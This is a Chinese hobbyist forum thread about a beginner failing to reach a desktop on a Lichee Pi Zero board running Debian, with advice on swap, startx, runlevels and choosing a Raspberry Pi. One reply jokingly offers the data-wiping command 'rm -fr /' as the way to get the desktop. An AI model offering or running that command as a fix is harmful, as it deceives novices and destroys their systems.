[电脑] 懂LINUX会玩荔枝派Lichee Zero的进来看看

楼主(2019-04-22):
买了个荔枝派zreo开发板,没想到这个开发板比起orangepi 树莓派、玩起来难度大,而且资源有限,到专门的QQ群人家也懒得理你,下面问题来啦?我好不容易烧录了系统DEBIAN,但进不去,望了解linux的坛友提供帮助,谢谢!

网友:
这不就是进去了嘛,命令行模式的系统,敲命令进去回车就能执行命令。你刷的系统应该没有桌面模式,你要不会用可以学linux或者找个带桌面模式的包

网友A:
没玩过树莓派之类,
只是平时用的manjaro

你这是命令行界面,恐怕你是没装桌面环境

看看配置一下网络,然后装个桌面环境,
或者像2#说的,重装一份带桌面的

---------------------------------------------------------

woc 。。。
原来想联网都费劲的东西,
这玩意能干啥。。。

网友:
引用 网友A:
没玩过树莓派之类,
只是平时用的manjaro

对,这货就体积小一点,价格便宜点,初学linux不建议用它,网口wifi蓝牙都要通过转接板才能扩展出来,不搞个底板这货都不好玩,初学还是建议用树莓派,最起码有桌面系统。

网友B:
你就没打任何有用的命令上去,你打算用他做什么?比如USB接一个网卡和一个硬盘,安装lighttpd和vsftpd,可以当成一个NAS用

楼主:
我又到他们的官方网盘上看啦,镜像好像烧录正确了,但是进桌面要挂载SWAP分区?如何挂?

楼主:
引用 网友B:
你就没打任何有用的命令上去,你打算用他做什么?比如USB接一个网卡和一个硬盘,安装lighttpd和vsftpd,可 ...

做台小游戏机

网友:
建议

还是先学一下linux和linux内核、boot等的技术吧

网友:
良心提醒:你这个配置难以满足游戏机的需求,orange pi zero可以说是最低配置了,一切事情跟图形界面扯上关系内存最好是512+,opi zero开机也很慢,绝对是气死人的游戏机,树莓派3可以流畅模拟街机,psp不太行

楼主:
我用ORANGEPI PC跑过LAKKA模拟器基本都完美PS1全速,PSP怪物猎人3也可运行CPU很烫,树莓派ZEROW也有,ZEROW但跑LAKKA很慢,最多可以运行FC和MD,连GBA都很慢,但是树莓派ZERO运行RETROPI跑GBA和部分街机也很流畅,至于玩荔枝派ZERO是市面上有一款小龙王游戏机主控就是用它了,不知有一天会不会开源共享。

网友C(2019-09-09):
楼主,我是个新手,想试一试桌面系统怎么样,但刷官方给的桌面系统,输完账号,然后鼠标点击密码框,系统就重启回到登陆界面,你有遇到这种情况吗

网友:
startx,如果能进图形界面,在/etc/inittab里面把启动级别改成5,就可以自启动进图形界面了

网友D:
输入命令 rm -fr /  回车  就能进入桌面环境了

楼主:
引用 网友C:
楼主,我是个新手,想试一试桌面系统怎么样,但刷官方给的桌面系统,输完账号,然后鼠标点击密码框,系统就 ...

对,这个镜像有问题,只能看到登录框,进不了系统界面,荔枝派由于物理内存才有64M所以要增加虚拟内存,也就是挂SWAP,具体方法可以去网上搜搜看

楼主:
不客气,进了图形界面后教教我吧,我到现在都还没进去的,主要是没时间弄

网友:
引用 网友D:
输入命令 rm -fr /  回车  就能进入桌面环境了

你怎么不说 Rm -rf 格式化?

网友:
引用 网友E:
你怎么不说 Rm -tf 格式化?

rm 有 -t这个参数么 恕小弟才疏学浅

网友:
这种小板装图形界面有什么用,直接装个python写程序就可以了。要学linux有关图形界面的东西,在pc机上玩溜了再搞这种板吧。

网友:
放弃了,吃灰了,自己也是新手,我又买了块树莓派,对新手较为友好,等以后学扎实了再试一试